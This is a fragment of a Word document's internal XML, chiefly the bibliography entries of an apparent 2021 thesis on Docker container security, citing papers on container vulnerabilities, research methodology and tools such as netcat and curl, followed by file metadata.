  </b:Source>
  <b:Source>
    <b:Tag>GIR19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{09F0A808-E3FA-45CD-8DEC-E7F8E076EBDE}</b:Guid>
    <b:Title>Comparative Analysis of Virtualization Methods in Big Data Processing</b:Title>
    <b:Year>2019</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Radchenko</b:Last>
            <b:First>G</b:First>
            <b:Middle>I</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Alaasam</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Tchernykh</b:Last>
            <b:First>A</b:First>
            <b:Middle>N</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Supercomputing Frontiers and Innovations</b:JournalName>
    <b:Pages>48-79</b:Pages>
    <b:Volume>6</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>70</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ARM16</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{8F36793F-49EA-4F02-95BB-305C860AF650}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Manu</b:Last>
            <b:First>A</b:First>
            <b:Middle>R</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Patel</b:Last>
            <b:First>J</b:First>
            <b:Middle>K</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Akhtar</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>A study, analysis and deep dive on cloud PAAS security in terms of Docker container security</b:Title>
    <b:JournalName>Proceedings of IEEE International Conference on Circuit, Power and Computing Technologies, ICCPCT 2016</b:JournalName>
    <b:Year>2016</b:Year>
    <b:Pages>1-13</b:Pages>
    <b:RefOrder>71</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SMa18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{74CD12B9-F60A-49CF-975C-802061F608C5}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Maheshwari</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Deochake</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>De</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Comparative Study of Virtual Machines and Containers for DevOps Developers</b:Title>
    <b:JournalName>arXiv preprint arXiv:1808.08192</b:JournalName>
    <b:Year>2018</b:Year>
    <b:Pages>1-9</b:Pages>
    <b:RefOrder>72</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>VJa21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{508D4A41-6D73-4743-94CB-9530AF050F18}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Jain</b:Last>
            <b:First>V</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Singh</b:Last>
            <b:First>B</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Static Vulnerability Analysis of Docker Images</b:Title>
    <b:JournalName>IOP Conference Series: Materials Science and Engineering</b:JournalName>
    <b:Year>2021</b:Year>
    <b:Pages>12-18</b:Pages>
    <b:Volume>1131</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>73</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SSu19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{882E1973-7071-4BD3-B9B2-9201D580FEB7}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sultan</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Ahmad</b:Last>
            <b:First>I</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Dimitriou</b:Last>
            <b:First>T</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Container Security: Issues, Challenges, and the Road Ahead</b:Title>
    <b:JournalName>IEEE Access</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages> 52976-52996</b:Pages>
    <b:Volume>7</b:Volume>
    <b:RefOrder>74</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SPM20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{35C5B285-9B73-4BE2-AE24-16D22B6ACE76}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mullinix</b:Last>
            <b:First>S</b:First>
            <b:Middle>P.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Konomi</b:Last>
            <b:First>E</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Davis</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>On Security Measures for Containerized Applications Imaged with Docker</b:Title>
    <b:JournalName>arXiv preprint arXiv:2008.04814</b:JournalName>
    <b:Year>2020</b:Year>
    <b:RefOrder>75</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>KBr20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{B5C74AE4-3FDB-49EF-AE7C-3438D8E9DF93}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Brady</b:Last>
            <b:First>K</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Moon</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Nguyen</b:Last>
            <b:First>T</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker Container Security in Cloud Computing</b:Title>
    <b:JournalName>2020 10th Annual Computing and Communication Workshop and Conference, CCWC 2020</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>975-980</b:Pages>
    <b:RefOrder>76</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ATo20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{EC7FF342-91FE-423C-8690-3104257CA550}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Tomar</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Jeena</b:Last>
            <b:First>D</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Mishra</b:Last>
            <b:First>P</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker security: A threat model, attack taxonomy and real-time attack scenario of DoS</b:Title>
    <b:JournalName>Proceedings of the Confluence 2020 - 10th International Conference on Cloud Computing, Data Science and Engineering</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>150-155</b:Pages>
    <b:RefOrder>77</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AAM16</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{0D4BBA38-2902-4F54-BCA5-1AE49C74560B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mohallel</b:Last>
            <b:First>A</b:First>
            <b:Middle>A.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Bass</b:Last>
            <b:First>J</b:First>
            <b:Middle>M.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Dehghantaha</b:Last>
            <b:First>A</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Experimenting with Docker: Linux Container and base OS attack surfaces</b:Title>
    <b:JournalName>International Conference on Information Society, i-Society 2016</b:JournalName>
    <b:Year>2016</b:Year>
    <b:Pages>17-21</b:Pages>
    <b:RefOrder>78</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>JWe20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{F61193A9-F08E-4CDB-A3F6-61FD99F8042C}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Wenhao</b:Last>
            <b:First>J</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Zheng</b:Last>
            <b:First>L</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Vulnerability Analysis and Security Research of Docker Container</b:Title>
    <b:JournalName>2020 IEEE 3rd International Conference on Information Systems and Computer Aided Education (ICISCAE)</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>354-357</b:Pages>
    <b:RefOrder>79</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>BRM21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{042033A5-491B-4F5D-A2F7-ABFF3CDC797A}</b:Guid>
    <b:Title>Positivism Research Philosophy</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>BRM</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>Business Research Methodology</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://research-methodology.net/research-philosophy/positivism/</b:URL>
    <b:RefOrder>80</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AMe18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{6F1637EB-7CAA-488D-B466-193775C8E556}</b:Guid>
    <b:Title>Towards an Explicit Research Methodology: Adapting Research Onion Model for Futures Studies</b:Title>
    <b:Year>2018</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Melnikovas</b:Last>
            <b:First>A</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Journal of Futures Studies</b:JournalName>
    <b:Pages>29-44</b:Pages>
    <b:Volume>23</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>81</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>PKO07</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{85537680-3787-4CA3-9F75-02E85D3464CC}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Overmars</b:Last>
            <b:First>P</b:First>
            <b:Middle>K.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Verburg</b:Last>
            <b:First>P</b:First>
            <b:Middle>H.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Veldkamp</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Comparison of a deductive and an inductive approach to specify land suitability in a spatially explicit land use model</b:Title>
    <b:JournalName>Land Use Policy</b:JournalName>
    <b:Year>2007</b:Year>
    <b:Pages>584-599</b:Pages>
    <b:Volume>24</b:Volume>
    <b:Issue>3</b:Issue>
    <b:RefOrder>82</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>CPo14</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{FAD5F9F2-F443-4275-BF4F-1226E9B460B6}</b:Guid>
    <b:Title>How to setup a workstation computer with Debian Wheezy and XFCE4</b:Title>
    <b:Year>2014</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Pontikis</b:Last>
            <b:First>C</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Month>August</b:Month>
    <b:Day>24</b:Day>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>21</b:DayAccessed>
    <b:URL>https://www.pontikis.net/blog/workstation-setup-debian-wheezy-xfce4</b:URL>
    <b:RefOrder>83</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Alp21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{97D98862-3757-4EEE-BA82-B6F4E7E4E4A7}</b:Guid>
    <b:Title>Alpine Linux</b:Title>
    <b:ProductionCompany>Alpine Linux</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>24</b:DayAccessed>
    <b:URL>https://www.alpinelinux.org/</b:URL>
    <b:RefOrder>84</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>CMa15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{1C8182B3-1440-4C26-86EB-A0F9FBC13CC3}</b:Guid>
    <b:Title>Shellshock attack on linux systems--bash</b:Title>
    <b:Year>2015</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mary</b:Last>
            <b:First>C</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>International Research Journal of Engineering and Technology</b:JournalName>
    <b:Pages>1322-1325</b:Pages>
    <b:Volume>2</b:Volume>
    <b:Issue>8</b:Issue>
    <b:RefOrder>85</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>JPe21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{71EC5D11-5C42-4CDD-823E-2D9FCA27AEC2}</b:Guid>
    <b:Title>How to Use Netcat Commands: Examples and Cheat Sheets</b:Title>
    <b:Year>2021</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Petters</b:Last>
            <b:First>J</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Month>March</b:Month>
    <b:Day>25</b:Day>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>23</b:DayAccessed>
    <b:URL>https://www.varonis.com/blog/netcat-commands/</b:URL>
    <b:RefOrder>86</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ubu21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{C3275C7A-CA20-449C-BD3A-302384DE9130}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>ubuntu</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>OpenSSH Server</b:Title>
    <b:ProductionCompany>ubuntu</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://ubuntu.com/server/docs/service-openssh</b:URL>
    <b:RefOrder>87</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc213</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{028B866C-8307-481A-A0C7-B19FCDC2F2D6}</b:Guid>
    <b:Title>docker-openssh-server</b:Title>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://github.com/linuxserver/docker-openssh-server</b:URL>
    <b:RefOrder>88</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>cur21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{B14BDBE9-1787-4498-997C-8D351A5F2255}</b:Guid>
    <b:Title>curl</b:Title>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://curl.se/</b:URL>
    <b:RefOrder>90</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Apa21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{710E47C0-7243-4B38-993E-E7870ADFBF4B}</b:Guid>
    <b:Title>Apache Tutorial: Dynamic Content with CGI</b:Title>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://httpd.apache.org/docs/2.4/howto/cgi.html</b:URL>
    <b:RefOrder>89</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Lin18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{FDDB3123-E339-4C4E-B4D0-33C58D39091A}</b:Guid>
    <b:Title>A Measurement Study on Linux Container Security: Attacks and Countermeasures</b:Title>
    <b:Year>2018</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Lin</b:Last>
            <b:First>X</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Lei</b:Last>
            <b:First>L</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Wang</b:Last>
            <b:First>Y</b:First>
          </b:Person>
          <b:Person>
            <b:Last>et.el</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Proceedings of the 34th Annual Computer Security Applications Conference</b:JournalName>
    <b:Pages>418-429</b:Pages>
    <b:RefOrder>54</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>BDo21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{AE1FCA33-F423-4ED0-8447-ACB9E34C5BCE}</b:Guid>
    <b:Title>10+ top open-source tools for Docker security</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>B Doerrfeld</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>TechBeacon</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>September</b:MonthAccessed>
    <b:DayAccessed>2</b:DayAccessed>
    <b:URL>https://techbeacon.com/security/10-top-open-source-tools-docker-security</b:URL>
    <b:RefOrder>91</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>BWo17</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{F7D2269C-86F5-4541-87D0-D43C507341C1}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Wootton</b:Last>
            <b:First>B</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Contino</b:Title>
    <b:ProductionCompany>Contino</b:ProductionCompany>
    <b:Year>2017</b:Year>
    <b:Month>January</b:Month>
    <b:Day>31</b:Day>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>October</b:MonthAccessed>
    <b:DayAccessed>21</b:DayAccessed>
    <b:URL>https://www.contino.io/insights/whos-using-docker</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{AFC29A51-4613-4679-A731-395E853A1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47071</TotalTime>
  <Pages>90</Pages>
  <Words>22939</Words>
  <Characters>130757</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1089</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Yohannes Woldesilassie Zerzghi (P151368)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yohannes Woldesilassie</cp:lastModifiedBy>
  <cp:revision>4798</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-05T00:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-09T09:41:00Z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4a43a01d-d6c8-35f1-b91d-fd6225db7f97</vt:lpwstr>
  </property>
</Properties>
</file>